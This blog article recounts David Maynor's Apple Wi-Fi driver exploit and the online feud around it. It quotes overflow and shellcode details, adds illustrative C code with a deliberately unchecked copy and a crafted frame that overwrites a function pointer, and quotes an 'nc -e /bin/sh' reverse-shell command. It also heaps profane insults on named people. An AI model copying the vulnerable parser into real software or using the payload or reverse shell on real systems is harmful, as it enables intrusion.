Rixstep

Hacker Finally Publishes Notorious Apple Wi-Fi Attack

It's no longer under NDA.


Over a year after first announcing a wireless hack into an Apple MacBook, David Maynor has finally published the story.

The details are found in the September issue of the Uninformed Journal.

Maynor's account takes you back to the point at which he accidentally came upon his discovery, and how he went about (against all odds) isolating it and later refining it.

The discovery was made while performing fuzzing experiments on other machines. 'One of the MacBooks in the vicinity running OS X 10.4.6 crashed unexpectedly', Maynor writes.

Maynor then goes into great detail to explain the rest of the story. It makes great reading - like a suspense novel.

Under NDA

Why publish now? 'Because I can publish it now', Maynor told IDG's Robert McMillan, and in the understatement of the century adds 'there's a lot of interesting information in the paper that if you're doing vulnerability research on Apple you'd find useful'.

Apple's Fault

Maynor makes it patently clear in his 'treatise' that the fault was indeed Apple's.

'The code found within the driver shows that although there is a length check in the open source driver, it's not actually present in the OS X binary driver.'

He also explains that the exploit requires a two-stage overwrite.

'The result of this flaw is that many things beyond the Extended Rate buffer in the ieee80211_scan_entry structure are corrupted. In addition to crashing reliably on the same data, the size of the memcpy is two bytes wide meaning that up to 65535 bytes can be copied. Since the destination of the memcpy is a structure that ends with a function pointer, the hope is that enough data can be written outside of the destination buffer to the point where the function pointer is overwritten. In this way the next time the function pointer is called the caller would instead jump to whatever address is now stored in the function pointer.'

No NX Protection

'This is an important step as OS X claims to have NX protection that would prohibit certain memory regions from executing code. Executing a NOP sled then 0xcc will prove that protection technologies like NX do not affect execution in this situation.'

Bye Bye Miss American Pie

Maynor's been harping for years that security researchers were getting it all wrong, and predicted two years ago that wireless hacks would be all the rage by now. The reason? It's no longer 'a' computer - it's several all rolled into one. And a hole in a driver puts you in the kernel: that's immediate root-level access, bypassing the normal authentication and privilege escalation controls. Get in, control the crash, and you own the machine.

'In other words, the Apple driver will copy five IEs from the original packet. One can cause an overflow in one of these elements, the Extended Rate IE, to overwrite structures that determine how the remaining four elements are copied. The copy of the RSN IE is chosen to make it possible to overwrite function pointers and store a first stage shellcode. The remaining three IEs, roughly 765 bytes in total, can be used to contain the real shellcode that does something useful, such as a connect-back shell, add a root user account, or play fun sounds on the speaker.'
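The bug class Maynor describes, modelled as an added example: this is illustrative code written for this page, not Maynor's code, Apple's binary driver, or the open source driver it was derived from. It assumes a hypothetical scan-entry struct (a 16-byte Extended Rate buffer, an RSN buffer, and a function pointer at the end, in that order), a parser that checks only that each element fits inside the received frame, and the same parser with the destination-size check that the quoted text says the OS X binary lacks. The IE blobs standing in for a received probe response are constructed by hand.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 802.11 element IDs used below (standard values). */
#define ELEMID_RATES  1
#define ELEMID_RSN    48
#define ELEMID_XRATES 50

/* Hypothetical, deliberately small scan entry: fixed buffers first,
 * a function pointer last, the ordering the quoted text describes. */
struct scan_entry {
    uint8_t  se_rates[16];
    uint8_t  se_xrates[16];   /* Extended Rate buffer */
    uint8_t  se_rsn[64];
    void   (*se_cb)(struct scan_entry *);
};

void legit_callback(struct scan_entry *e) { (void)e; }

/* Copies each IE body into its slot.  The frame-bounds check stops reads
 * past the packet, but nothing compares len to the destination size:
 * an Extended Rate IE longer than 16 bytes runs over se_rsn and se_cb. */
int parse_ies_vulnerable(struct scan_entry *e, const uint8_t *ies, size_t total)
{
    size_t off = 0;
    while (off + 2 <= total) {
        uint8_t id = ies[off];
        uint16_t len = ies[off + 1];            /* widened to 16 bits */
        const uint8_t *body = ies + off + 2;
        if (off + 2 + len > total)
            return -1;
        switch (id) {
        case ELEMID_RATES:  memcpy(e->se_rates,  body, len); break;
        case ELEMID_XRATES: memcpy(e->se_xrates, body, len); break; /* BUG */
        case ELEMID_RSN:    memcpy(e->se_rsn,    body, len); break;
        default: break;
        }
        off += 2 + len;
    }
    return 0;
}

/* Same parser with the destination-size check: the frame is rejected
 * at the first oversized element, before that copy happens. */
int parse_ies_hardened(struct scan_entry *e, const uint8_t *ies, size_t total)
{
    size_t off = 0;
    while (off + 2 <= total) {
        uint8_t id = ies[off];
        uint16_t len = ies[off + 1];
        const uint8_t *body = ies + off + 2;
        if (off + 2 + len > total)
            return -1;
        switch (id) {
        case ELEMID_RATES:
            if (len > sizeof e->se_rates) return -2;
            memcpy(e->se_rates, body, len); break;
        case ELEMID_XRATES:
            if (len > sizeof e->se_xrates) return -2;
            memcpy(e->se_xrates, body, len); break;
        case ELEMID_RSN:
            if (len > sizeof e->se_rsn) return -2;
            memcpy(e->se_rsn, body, len); break;
        default: break;
        }
        off += 2 + len;
    }
    return 0;
}

/* Constructed IE blob: a well-formed Rates + Extended Rates pair. */
size_t build_benign_frame(uint8_t *buf)
{
    static const uint8_t frame[] = {
        ELEMID_RATES,  4, 0x82, 0x84, 0x8b, 0x96,
        ELEMID_XRATES, 2, 0x0c, 0x12,
    };
    memcpy(buf, frame, sizeof frame);
    return sizeof frame;
}

/* Constructed Extended Rate IE just long enough to reach through se_rsn
 * into se_cb (88 bytes on a 64-bit build; the IE length octet allows 255). */
size_t build_malicious_frame(uint8_t *buf)
{
    size_t len = sizeof ((struct scan_entry *)0)->se_xrates
               + sizeof ((struct scan_entry *)0)->se_rsn
               + sizeof ((struct scan_entry *)0)->se_cb;
    buf[0] = ELEMID_XRATES;
    buf[1] = (uint8_t)len;
    memset(buf + 2, 0x41, len);             /* 'A's land in the pointer */
    return 2 + len;
}

int check_benign_accepted(void)
{
    uint8_t buf[300];
    struct scan_entry e;
    size_t n = build_benign_frame(buf);
    memset(&e, 0, sizeof e);
    e.se_cb = legit_callback;
    return parse_ies_vulnerable(&e, buf, n) == 0
        && parse_ies_hardened(&e, buf, n) == 0
        && e.se_cb == legit_callback
        && e.se_xrates[0] == 0x0c;
}

int check_malicious_rejected(void)
{
    uint8_t buf[300];
    struct scan_entry e;
    size_t n = build_malicious_frame(buf);
    memset(&e, 0, sizeof e);
    e.se_cb = legit_callback;
    return parse_ies_hardened(&e, buf, n) == -2 && e.se_cb == legit_callback;
}

int main(void)
{
    uint8_t buf[300];
    struct scan_entry e;
    size_t n = build_malicious_frame(buf);
    memset(&e, 0, sizeof e);
    e.se_cb = legit_callback;
    /* Vulnerable path on the crafted frame: the copy stays inside the
     * struct here, so it completes, but se_cb now holds 0x4141...; a
     * driver that later calls e.se_cb jumps there.  (Builds with glibc's
     * _FORTIFY_SOURCE enabled abort on this memcpy instead.) */
    parse_ies_vulnerable(&e, buf, n);
    printf("se_cb after vulnerable parse: %p\n", (void *)e.se_cb);
    printf("hardened parse returns %d\n", parse_ies_hardened(&e, buf, n));
    return 0;
}
```

The point of the model is the one Maynor makes: the bounds check that matters is against the destination buffer, not the frame, and because the overflowed buffer sits in front of a function pointer, controlling the overflow length and contents means controlling where the driver jumps next. The staging through the RSN element and the remaining IEs that the quoted text describes builds on exactly this primitive.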

The News Wasn't the News

But as per usual when Apple are involved - or can get themselves involved - the story wasn't so much the discovery of a missing buffer check in Apple's version of the open source driver as the typically hysterical fanboy reaction.

David Chartier, Glenn Fleishman, Jim Thompson, the Dalrymple™ - and of course every fanboy's fanboy John Gruber all got in the act, slung the mud and let the lies and hysteria cloud the issues. The 'Defenders of the Faith'. Even to this day irretrievably ignorant morons like Joshua Topolsky continue to hurl the shite.

It might be interesting to see what they said one year ago.

Fanboy Quotes - Then and Now

The problem here is that this experiment was not one of those quests for truth - it was a quest for, in the words of Mr Colbert: truthiness. We're genuinely sorry you're annoyed by the commercials, Mr Maynor (believe me: not everyone loves them) but that's why some genius some time ago invented the ability to change TV channels. Give that remote a whirl some time - it might make your life (and ours) a whole lot easier.
 - David Chartier

The Maynor video is complete fiction.
 - Jim Thompson

it's just useless bias from every party and TUAW is at fault here promoting FEAR and stupid sensationalism
 - michel

But you are advocates of jumping on bandwagons and creating 'crisis 2.0s' where there are none. Just as I said in response to when Dan Laurie wrote that blog: Crisis 2.0 comes from self-important bloggers who have a chicken little, the sky is falling, mentality and don't have the acuity to read a situation correctly. Except for one writer, who I like a lot, this blog is successfully imploding on itself.
 - Wheels

You know, maybe TUAW could tell us whether or not there's a vulnerability, and how to plug it if so, and give up on this whole 'Well, we didn't like the guy and we thought he was a dick so technically that kind of makes him wrong' non-story.
 - Bob S

Um, am I not getting something out of this that Bob S. is? They were running the hack on third party hardware, with third party drivers. Why would you need a third party wireless card on a machine that has one built in? Here's your work around, get your computer fixed if the internal card dies! Are you even a Mac user, Bob? There's not a patch for the Macbook, because the problem is not with Apple hardware! And why would TUAW post the 'workaround' if the problem is with a non Apple product?
 - Fred

Oookay, calm down folks. Need I mention that this is a blog, and not a news site in any official capacity? If you don't like what's being posted, don't whine and moan, just go somewhere else. (Really, I shouldn't even have to tell you this.)
 - pseudoprometheus

Also, I don't know if you guys caught this, but it seemed to me like the user would have to actually connect to the ad-hoc network before the vulnerability could even take place. I'm sorry, but apple's software warns you before connecting to an ad-hoc network to begin with. So really, if it doesn't even work with Apple's wireless cards, and Apple warns you of the risks, then how is this a threat? Surely I can come up with hundreds of scenarios like this where if you connect to an ad-hoc network of someone's machine they could do whatever they want, take packet sniffing for example. Duh.
 - Thayne Miller

Watch the mainstream media sidestep this. They only want sensationalist journalism.
 - Jon

I put the blame for this debacle solely on the shoulders of Brian Krebs, the Washington Post blogger, and his editor who created the initial headline. Krebs used the sensational aspect of the story 'Apple's MacBook hacked' without asking the right questions or presenting this vulnerability as being entirely dependent on the use of a third-party wireless card using third-party drivers. It was immediately obvious upon watching the video that this hack required a specific situation that could be avoided by smart users. Rather than point out how users could avoid the flaw, Krebs and the Washington Post went for hits.
 - Paul Ingram

something strikes me funny about this ordeal... some people say don't blame tuaw because its a blog site and it not a news site... krebs posted this on a blog too (right?) so how can someone give a waiver just based on the type of site, but villify another?
 - ljbad4life

Were the authors of these articles too lazy to actually watch the video? The researchers don't say anything about it being the internal mac card. They clearly say that the exploit was shown with a third party card.
 - john

Sure, we watched the video, but did you read the articles? Brian states that the problem is with the internal hardware, making up excuses that Apple 'leaned' on them to prevent them from publicizing this, without providing a shred of evidence, or a name - nothing. They reassured us the flaw works on the internal hardware/software that comes on the MacBook, but have now finally admitted that was a blatant lie.
 - David Chartier

I guess I really must be missing the point here. Some guys said the Macbook had a flaw, and that it could be easily hacked. Then it comes out that it's really not that easy. THEN, it comes out that it's not so much that the Macbook is 'hackable' but that if you knowingly do something that is unsafe, someone could get into your machine? That's shocking!!!
 - Fred

Awesome. That's all I gotta say. Awesome. Airport rocks.
 - Paul

That smallworks description of the events that transpired was absolutely amazing. Dude took it apart like the Zapruder film and talked way over my head!
 - Joel Conrad Bechtolt

I think I just wasted too much of my time looking for something that isn't there. Any one else feeling a bit duped?
 - Gary Keen

David, your article is bull. This title of yours is despicable. Explain this lie in your title and your story David. It is bad enough you accuse them of falsification without proof, but it's absolutely disgusting you would accuse them of admitting to falsification. Did you even bother to read the word-for-word transcript I linked to in second to last paragraph? David did you even attend Black Hat or DEFCON? Did you ever contact Maynor? Did you even look at the original presentation let alone understand it? You're calling Maynor a liar because they're following responsible disclosure. You have no way to know if Apple leaned on them or not. You don't know what you're talking about here. All of the gory details will come out in the next few days, and you're going to look real foolish when it does.
 - George Ou

I don't think Maynor and Ellch have discovered such a vulnerability in the default MacBook AirPort card and driver, and so, if I'm right, they certainly won't accept this challenge. I think what they've discovered - if they've in fact discovered anything useful at all - is a class of potential Wi-Fi-based exploit, which they demonstrated on a rigged MacBook to generate publicity at the expense of the Mac's renowned reputation for security, but that they have not found an actual exploit based on this technique that works against the MacBook's built-in AirPort.
 - John Gruber

But They Were Right!

Brian Krebs, George Ou, HD Moore - but they were right! And what no one seems to grasp to this day is that David Maynor actually did demo the exploit live on an out-of-the-box MacBook - before the Black Hat presentation. Some people just don't read and some people don't know how to listen. The switch to the third-party card was for the video clip only - the discovery was made on a MacBook 'as is'. Live. OOTB Apple computer. No USB stick. Not prerecorded. L-I-V-E.

But if Brian, George, and HD were all right - doesn't that make everyone else wrong?

Doesn't that make 'Charlie' the infamous 'Brian Krebs Watch' blogger who's defiled Brian's blog, vandalised his Wiki article, and tried to have him sacked sort of like a super twisted fuck?

Doesn't it make Jim Thompson who declared he could prove the demo was a fake sort of like awfully fucking stupid?

Doesn't it make the Dalrymple™, David Chartier, and John Gruber sort of like super nutter Lynn Fox fanboy pawns? Doesn't it force their readers to finally acknowledge they're irretrievably stupid and they're deliberately duping their readers?

Yes to all the above - unless you're a fanboy...

Postscript: The Toorcon Tussle

On 7 October 2006 Rixstep's Xnews published a record-size account of the Maynor affair. It included choice fanboy quotes penned at the time by most of the dramatis personae cited above.

What's the secret of the fanboys? They're scared. Scared shitless. They don't see an exploit as something to fix - they see it as an attack on their cult. And being so pathologically scared, they learn to hate - and engage in an astounding level of hyperbole.

So much was obvious then - seeing it now in light of what's transpired makes for some very enjoyable reading.

I think Brian Krebs is lying about seeing an exploit run on the stock Airport drivers.
 - 'Charlie' at Brian Krebs Watch

Joining Krebs in line to flush his credibility and reputation down the journalistic toilet is ZDNet's George Ou.
 - John Gruber

No one who has actually watched their video is disputing that the exploit demonstrated by Maynor and Ellch in the video of a MacBook equipped with a third-party USB wireless card.
 - John Gruber (Note sentence is grammatically incorrect.)

That this sort of basic middle school level logic should need to be painstakingly spelled out for the computer security columnist for the Washington Post is astounding.
 - John Gruber

I thus see no way out of this where Maynor and Ellch escape with their reputations intact, other than if they have in fact discovered a vulnerability against the stock MacBook card and driver, that they have disclosed their findings privately to Apple, and that the statement issued Friday by Apple's Lynn Fox is in fact scurrilously false. But even in this scenario - which as I see it is the best case for Maynor and Ellch - if they know for certain that MacBooks, as shipped by Apple, are vulnerable, why have they not plainly said so? I'm not saying they should have publicly described the nature of the vulnerability in any detail, but they certainly should have stated clearly that owners of whatever specific Macintoshes they have identified flaws against should be careful when turning on AirPort in any public or non-trusted environment.
 - John Gruber

In short, either Maynor and Ellch have discovered an exploit against a stock MacBook and Apple has decided, incomprehensibly, to scurrilously besmirch their reputations with flat-out lies that will soon be disproved and will bring disgrace to Apple Computer, or, Maynor and Ellch have not discovered such an exploit and they are, at best, gross exaggerators, or, at worst (and more likely in my opinion), outright frauds.
 - John Gruber

It is becoming more and more clear that the reporting Krebs 'stands by' is false.
 - John Gruber

So at the beginning of August, Maynor and Ellch told Krebs that the default MacBook drivers were exploitable, but would not, even on video, demonstrate an exploit against them publicly. As of last Thursday, however, their SecureWorks web site explicitly states that their video demonstration does not involve Apple's default drivers, and both Apple and Atheros issued unequivocal statements that Maynor and Ellch have not provided Apple with any evidence showing a flaw in Apple's drivers.
 - John Gruber

Brian Krebs has dugg himself a mighty deep hole.
 - John Gruber

George Ou is going down with the ship.
 - John Gruber

Something stinks. Maynor explicitly states that he isn't using the internal Apple Airport card, but this is the card with the IP address.
 - Jim Thompson

Rather than come out and state 'the Airport card is not vulnerable', they decided that they must have enough sizzle in their story to get noticed. It just wasn't going to get anyone's notice if they showed their little hack on Windows. Everyone knows that Windows is swiss cheese by now.
 - Jim Thompson

What makes this little factoid interesting is that there was a bug in the Information Element (IE) handling in the freebsd-6.0 Atheros driver that probably clued Maynor and Ellch into the possibilities.
 - Jim Thompson

In what must now be viewed as a desperate attempt to drum up business for Maynor's firm, the pair implies they went and found a USB device with a driver for MacOS that would forward unsolicited probe response frames, and then, via methods they are too shy (or embarrassed) to explain, attached same to a 'reverse shell' process on the Macbook. Frankly, from what we're shown, it's possible that all Maynor does is type nc -e '/bin/sh' 192.168.1.1 port-num, and then simply clears the screen. The version of nc that comes with MacOS doesn't support the '-e' switch, but it would be easy to compile it in and replace the stock nc binary.
 - Jim Thompson

The last two newsletters have been too funny. I have had some fanboy experience myself, having been a hardware and software developer for Amiga computers at Applied Magic back in the late 90s during the Commodore meltdown. I have to say that even the most rabid Video Toaster equipped Amiga fanboy doesn't hold a candle to the ones generated by Apple. Keep it up, this makes for some fun reading.
 - Xnews reader

Copyright © Rixstep. All rights reserved.